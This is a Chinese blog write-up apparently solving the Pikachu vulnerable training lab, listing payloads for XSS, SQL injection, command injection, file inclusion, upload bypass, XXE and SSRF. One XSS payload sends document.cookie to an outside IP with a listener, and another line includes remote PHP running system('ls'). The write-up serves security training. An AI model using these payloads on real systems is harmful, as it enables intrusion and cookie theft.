pikachu靶场通关

Pikachu靶场

XSS

反射性

修改maxlength

<script>alert('XSS')</script>

反射性-POST

先登录

<script>alert('XSS')</script>

存储XSS

<script>alert('XSS')</script>

会将payload存在数据库中,每次点击这个功能都会触发这个xss

DOM型XSS

' onclick="alert(1)">

DOM型XSS-X

' onclick="alert(1)">

XSS盲打

在可以输入的地方全部输入payload

监听

python3 -m http.server 7777

输入

<script>location.href="http://49.234.56.200:7777/"+document.cookie</script>

点击右上角tips登录后台,触发payload,监听地址接收到请求

XSS过滤

大写绕过

<SCRIPT>alert(/1/)</SCRIPT>

XSS之htmlspecialchars

htmlspecialchars默认是不对单引号进行转义的

' οnclick='alert(1)'>

XSS之href输出

javascript:alert(1)

XSS之JS输出

会将输入值放到js源码中,闭合js语句,在页面中插入js语句

'</script><script>alert(1)</script>

SQL注入

数字型

id=1 union select 1,2&submit=%E6%9F%A5%E8%AF%A2

字符型

?name=kobe' union select 1,2--+&submit=%E6%9F%A5%E8%AF%A2

搜索型

?name=1' union select 1,2,3--+&submit=%E6%90%9C%E7%B4%A2

xx型注入

输入z’ sql语句报错

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''z'')' at line 1

闭合

?name=z') union select 1,2--+&submit=%E6%9F%A5%E8%AF%A2

insert/update注入

sex=girls&phonenum=18656565545' or extractvalue(0x0a,concat(0x0a,(select database()))) or '&add=usaxxxx&email=kobe%40pikachu.com&submit=submit

delete注入

?id=58+and+extractvalue(0x0a,concat(0x0a,(select+database())))

http header注入

' or extractvalue(0x0a,concat(0x0a,(select database()))) or '

布尔盲注

?name=lucy' and if(1>2,1,0)--+&submit=%E6%9F%A5%E8%AF%A2

时间盲注

?name=lili' and if(3>2,sleep(5),0)--+&submit=%E6%9F%A5%E8%AF%A2

宽字节注入

name=lucy%df%27 union select 1,2--+&submit=%E6%9F%A5%E8%AF%A2

RCE

exec ping

12 || whoami 两个都会执行
12 | whoami  第一个为假 执行第二个

127.0.0.1 && whoami 都会执行
127.0.0.1 && whoami 都会执行

12 && whoami 执行第一个
12 & whoami 两个都执行

exec eval

php代码执行

system('whoami');

File inclusion

本地文件包含

?filename=../../../a.txt&submit=%E6%8F%90%E4%BA%A4

远程文件包含

?filename=http://49.234.56.200/x.php?1=system('ls');&submit=%E6%8F%90%E4%BA%A4

Unsafe Filedownload

?filename=../../../index.php

Unsafe Fileupload

client check

客户端check

MIMI Type

Content-Type: image/jpeg

getimagesize

GIF89a
<?php phpinfo(); ?>

Ove Permission

水平越权

修改用户名可查看其他用户信息

?username=kobe&submit=点击查看个人信息

垂直越权

目录遍历

?title=../../../README.md

敏感信息泄露

源码泄露测试账号

 </div><!-- 测试账号:lili/123456-->

PHP反序列化

<?php
class S{
       public $test="<script>alert(1)</script>";
   }
   $s=new S(); //创建一个对象
   echo serialize($s);
?>

XXE

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [<!ENTITY goodies SYSTEM "file:///proc/net/arp">]>
<user><username>&goodies;</username><password>testtest</password></user>

SSRF

curl

http://192.168.52.137/pikachu/vul/ssrf/ssrf_curl.php?url=http://www.baidu.com

file_get_content

http://192.168.52.137/pikachu/vul/ssrf/ssrf_fgc.php?file=file:///c:/windows/win.ini
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值